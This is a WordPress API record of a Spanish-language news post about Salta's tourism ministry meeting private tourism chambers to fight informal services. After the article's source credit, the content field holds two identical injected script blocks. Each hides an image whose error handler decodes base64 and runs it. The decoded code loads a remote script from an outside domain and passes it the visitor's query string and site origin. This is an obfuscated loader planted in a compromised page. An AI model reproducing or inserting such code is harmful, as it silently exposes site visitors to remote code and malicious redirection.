{"id":4896,"date":"2025-02-27T10:45:00","date_gmt":"2025-02-27T13:45:00","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4896"},"modified":"2025-08-13T23:39:38","modified_gmt":"2025-08-14T02:39:38","slug":"trabajo-conjunto-entre-turismo-y-el-sector-privado-para-combatir-la-informalidad","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4896","title":{"rendered":"Trabajo conjunto entre Turismo y el sector privado para combatir la informalidad"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-cf6013e51dfe89c3f4589d83fbaa3bc0\" style=\"background-color:#8e0447\"><strong><em>Representantes de c\u00e1maras y asociaciones tur\u00edsticas mantuvieron un encuentro sobre la normativa vigente con el objetivo garantizar la seguridad de los visitantes<\/em><\/strong><\/h4>\n\n\n\n<p>El&nbsp;<strong>Ministerio de Turismo y Deportes<\/strong>, en el marco del trabajo conjunto con el sector tur\u00edstico privado, mantuvo una reuni\u00f3n encabezada por la secretaria de Turismo&nbsp;<strong>Nadia Loza<\/strong>, para poder articular mecanismos que optimicen el registro y control de los servicios tur\u00edsticos de la provincia. La funcionaria, al respecto, manifest\u00f3 que el objetivo de estas mesas de abordaje, es \u201ccontinuar la tarea conjunta en torno a la normativa vigente, para evitar la informalidad y garantizar la seguridad de los visitantes, lo que es imprescindible para que el destino Salta contin\u00fae creciendo, en un contexto con reglas claras\u201d.<\/p>\n\n\n\n<p>En este sentido, la Direcci\u00f3n General de Control de Servicios Tur\u00edsticos expuso puso en conocimiento de todos los presentes, acerca de los Registros que habilitan los distintos servicios de los prestadores, entre los que se refirieron a alojamientos tur\u00edsticos, alquileres temporarios, Rent a car, Gu\u00edas de Turismo, prestadores alternativos, Ruta del Vino y organizadores de eventos. Asimismo, dieron parte sobre el trabajo realizado durante 2024 y lo que va del 2025, y la agenda programada para el a\u00f1o en curso.<\/p>\n\n\n\n<p>Los representantes de las C\u00e1maras y Asociaciones tur\u00edsticas hicieron lo propio en materia de necesidades y destacaron a la importancia de llevar adelante tareas conjuntas y el fortalecimiento del trabajo que se realiza con los municipios, haciendo hincapi\u00e9 en la necesidad de continuar articulando acciones entre el sector p\u00fablico y el privado, para generar crecimiento y valor al destino con servicios tur\u00edsticos de calidad.<\/p>\n\n\n\n<p>Participaron tambi\u00e9n de la reuni\u00f3n, el subsecretario de Desarrollo y Competitividad Juan Lucero; la directora general de Control de Servicios Tur\u00edsticos Cecilia Ruiz; el coordinador del Ente de Turismo de la ciudad de Salta Fernando Garc\u00eda Soria; el secretario de la C\u00e1mara de Turismo Mauricio Clark; la presidenta de AHT &nbsp;Mariana Farjat, el presidente de la C\u00e1mara Hotelera y Gastron\u00f3mica Juan Chib\u00e1n, Daniel Astorga, Presidente del Salta Convention &amp; Visitors Bureau, de la C\u00e1mara de Turismo de Vaqueros Donatella Berardi, por Agencias de Viajes la vicepresidenta Adriana Palitzky.<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Representantes de c\u00e1maras y asociaciones tur\u00edsticas mantuvieron un encuentro sobre la normativa vigente con el objetivo garantizar la seguridad de los visitantes El&nbsp;Ministerio de Turismo y Deportes, en el marco del trabajo conjunto con el sector tur\u00edstico privado, mantuvo una reuni\u00f3n encabezada por la secretaria de Turismo&nbsp;Nadia Loza, para poder articular mecanismos que optimicen el [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4897,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[20],"tags":[],"class_list":{"0":"post-4896","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-empresas"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4896"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4896"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4896\/revisions"}],"predecessor-version":[{"id":6559,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4896\/revisions\/6559"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4897"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4896"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4896"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4896"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}